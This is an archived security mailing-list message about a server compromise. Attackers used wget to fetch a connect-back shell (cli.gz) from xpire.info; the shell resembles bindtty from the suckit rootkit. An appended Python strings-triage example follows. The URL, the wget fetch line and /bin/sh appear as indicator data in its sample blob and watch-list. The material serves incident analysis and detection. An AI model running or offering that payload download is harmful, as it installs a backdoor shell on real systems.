Open Source and information security mailing list archives
Message-ID: <417CF08F.4792.19DC5B30@localhost>
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Subject: xpire.info & splitinfinity.info - exploits in the wild

Elia Florio wrote:

> > I'm not sure that qmail-inject isn't a red herring? The actual
> > download looks like 'wget' was used.
>
> Good suggestion, my friend :)
>
> WGET was used to retrieve the http://xpire.info/cli.gz connectback shell.

More specifically, from the strings in the binary it looks awfully like
sd's bindtty -- try Googling for "bindtty.c"...

The possible bad news is that bindtty is used in the suckit rootkit, so
your remote-only access may cause major (if not insurmountable) problems
to doing a half-useful diagnosis...

<<big snip>>

> The hacker pages used to accomplish the injection are based on this
> test-page, taken directly from the hacker site :-)
>
> http://xpire.info/s/2
> http://xpire.info/s/
>
> I notice that this site is full of trojan/backdoor/shell/worm/exploit and
> other malware....why is it still open?

You'd be surprised how few folk actually complain about a lot of these
sites. Compound that with the rate of incompetence at many small (and
even many not-so-small) ISPs, where the very thin margins mean they don't
have time (and seldom good enough staff anyway) to analyse such
complaints, and where the emphasis is often more on making sure they get
their $10, $20, $40, etc this month from that customer, and many such
sites stay up way too long.

The way to break such sites is for some "authority" to contact them (a
CERT, law enforcement, etc) or "enough" polite, professional, clearly
technically competent but not overly technical complaints explaining what
the site is being used for and why it should be shut down.

Of course, often the "base" sites are themselves simply just
ill-maintained systems that have, themselves, been hacked, and if all the
ISP is up to doing is closing the apparently rogue site/account, or
simply removing the "offending content", the site (and others similarly
hosted on the still badly maintained servers) remains open to further,
similar abuse.

Regards,

Nick FitzGerald
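The "from the strings in the binary" call above is the usual first-pass triage of a dropped binary: pull the printable runs out of it and look for tell-tale names. The following is an added example of that step, not code from this thread or from the bindtty/suckit projects. It reimplements the core of strings(1) (printable-ASCII runs of at least four bytes) and matches the result against a small watch-list; the watch-list terms "bindtty" and "xpire.info" come from the thread, the others ("/bin/sh", "wget") are assumptions for illustration, and the sample blob is constructed, not the real cli.gz payload.

```python
"""
Minimal strings(1)-style triage of a suspect binary: extract printable
runs and flag those that match a watch-list of indicator terms.
Added example; not code from the thread or from any rootkit project.
"""
import re
from typing import Dict, List, Sequence

# Watch-list. "bindtty" and "xpire.info" are named in the thread; the
# rest are assumed indicators a connect-back/bind shell commonly carries.
INDICATORS: Sequence[str] = ("bindtty", "xpire.info", "/bin/sh", "wget")

# strings(1) defaults to runs of 4 or more printable characters.
MIN_LEN = 4


def extract_strings(blob: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Return printable-ASCII runs of at least min_len bytes, in file order."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(blob)]


def flag_indicators(strings: Sequence[str],
                    indicators: Sequence[str] = INDICATORS) -> Dict[str, List[str]]:
    """Map each indicator term to the extracted strings containing it
    (case-insensitive substring match; a plain 'bind' does not match 'bindtty')."""
    hits: Dict[str, List[str]] = {}
    for s in strings:
        low = s.lower()
        for ind in indicators:
            if ind.lower() in low:
                hits.setdefault(ind, []).append(s)
    return hits


# Constructed sample: an ELF-looking header followed by strings separated
# by non-printable junk, including one run ("ab") too short to count.
SAMPLE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/bin/sh\x00" + b"\x90\x01\x02"
    + b"bindtty by sd\x00" + b"\xff\xfe"
    + b"wget http://xpire.info/cli.gz\x00"
    + b"ab\x00"
    + b"socket\x00bind\x00listen\x00"
)


def triage(blob: bytes = SAMPLE):
    """Run extraction and flagging over a blob; returns (strings, hits)."""
    strs = extract_strings(blob)
    return strs, flag_indicators(strs)


if __name__ == "__main__":
    strs, hits = triage()
    for s in strs:
        print(s)
    print("indicators:", hits)
```

On a real box you would run `strings -a` against the file (or against a copy pulled off the machine) rather than this script; the point of the example is the logic, and in particular that a matching string is a lead to chase (fetch bindtty.c and compare), not proof of the binary's identity. It also does not address the thread's larger caveat: if a kernel rootkit like suckit is in place, what you read through the compromised host's own tools cannot be trusted, so the blob should come from offline media or a memory/disk image taken from outside the running system.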